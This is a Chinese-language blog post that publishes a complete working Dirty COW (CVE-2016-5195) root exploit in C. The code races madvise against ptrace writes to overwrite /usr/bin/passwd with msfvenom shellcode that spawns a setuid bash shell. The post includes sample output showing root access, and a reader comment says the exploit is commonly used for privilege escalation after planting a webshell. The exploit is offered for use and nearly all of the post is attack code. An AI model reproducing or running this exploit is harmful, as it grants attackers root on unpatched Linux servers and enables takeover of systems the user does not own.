脏牛 POC CVE-2016-5195

脏牛漏洞(CVE-2016–5195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android、桌面版和服务器版都受到其影响。恶意攻击者通过该漏洞可以轻易地绕过常用的漏洞防御方法,对几百万的用户进行攻击。尽管已针对该漏洞进行了补丁修复,但国外安全公司Bindecy对该补丁和内容做出深入研究后发现,脏牛漏洞的修复补丁仍存在缺陷,由此产生了“大脏牛”漏洞。

脏牛那个洞测试了下在2.6.32下面基本上可以比较稳定的利用,这个POC比较好用

脏牛 POC

  1. /*
  2. * A PTRACE_POKEDATA variant of CVE-2016-5195
  3. * should work on RHEL 5 & 6
  4. *
  5. * (un)comment correct payload (x86 or x64)!
  6. * $ gcc -pthread c0w.c -o c0w
  7. * $ ./c0w
  8. * DirtyCow root privilege escalation
  9. * Backing up /usr/bin/passwd.. to /tmp/bak
  10. * mmap fa65a000
  11. * madvise 0
  12. * ptrace 0
  13. * $ /usr/bin/passwd
  14. * [root@server foo]# whoami
  15. * root
  16. * [root@server foo]# id
  17. * uid=0(root) gid=501(foo) groups=501(foo)
  18. * @KrE80r
  19. */
  20. #include <fcntl.h>
  21. #include <pthread.h>
  22. #include <string.h>
  23. #include <stdio.h>
  24. #include <stdint.h>
  25. #include <sys/mman.h>
  26. #include <sys/stat.h>
  27. #include <sys/types.h>
  28. #include <sys/wait.h>
  29. #include <sys/ptrace.h>
  30. #include <unistd.h>
  31.  
  32. int f;
  33. void *map;
  34. pid_t pid;
  35. pthread_t pth;
  36. struct stat st;
  37.  
  38. // change if no permissions to read
  39. char suid_binary[] = "/usr/bin/passwd";
  40.  
  41. /*
  42. * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
  43. */
  44. unsigned char shell_code[] = {
  45. 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  46. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  47. 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  48. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  49. 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  50. 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  51. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  52. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  53. 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  54. 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  55. 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  56. 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  57. 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  58. 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  59. 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
  60. };
  61. unsigned int sc_len = 177;
  62.  
  63. /*
  64. * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
  65. unsigned char shell_code[] = {
  66. 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  67. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  68. 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  69. 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  70. 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  71. 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  72. 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  73. 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  74. 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  75. 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  76. 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  77. 0x89, 0xe1, 0xcd, 0x80
  78. };
  79. unsigned int sc_len = 136;
  80. */
  81.  
  82. void *madviseThread(void *arg) {
  83. int i,c=0;
  84. for(i=0;i<200000000;i++)
  85. c+=madvise(map,100,MADV_DONTNEED);
  86. printf("madvise %d\n\n",c);
  87. }
  88.  
  89.  
  90. int main(int argc,char *argv[]){
  91.  
  92. printf(" \n\
  93. (___) \n\
  94. (o o)_____/ \n\
  95. @@ ` \\ \n\
  96. \\ ____, /%s \n\
  97. // // \n\
  98. ^^ ^^ \n\
  99. ", suid_binary);
  100. char *backup;
  101. printf("DirtyCow root privilege escalation\n");
  102. printf("Backing up %s to /tmp/bak\n", suid_binary);
  103. asprintf(&backup, "cp %s /tmp/bak", suid_binary);
  104. system(backup);
  105.  
  106. f=open(suid_binary,O_RDONLY);
  107. fstat(f,&st);
  108. map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
  109. printf("mmap %x\n\n",map);
  110. pid=fork();
  111. if(pid){
  112. waitpid(pid,NULL,0);
  113. int u,i,o,c=0,l=sc_len;
  114. for(i=0;i<10000/l;i++)
  115. for(o=0;o<l;o++)
  116. for(u=0;u<10000;u++)
  117. c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shell_code+o)));
  118. printf("ptrace %d\n\n",c);
  119. }
  120. else{
  121. pthread_create(&pth,
  122. NULL,
  123. madviseThread,
  124. NULL);
  125. ptrace(PTRACE_TRACEME);
  126. kill(getpid(),SIGSTOP);
  127. pthread_join(pth,NULL);
  128. }
  129. return 0;
  130. }

git:https://gist.github.com/KrE80r/42f8629577db95782d5e4f609f437a54

原文连接:脏牛 POC CVE-2016-5195 所有媒体,可在保留署名、原文连接的情况下转载,若非则不得使用我方内容。

  1. 隐士说道:

    此漏洞常用于得到webshell下linux提权

发表评论

邮箱地址不会被公开。 必填项已用*标注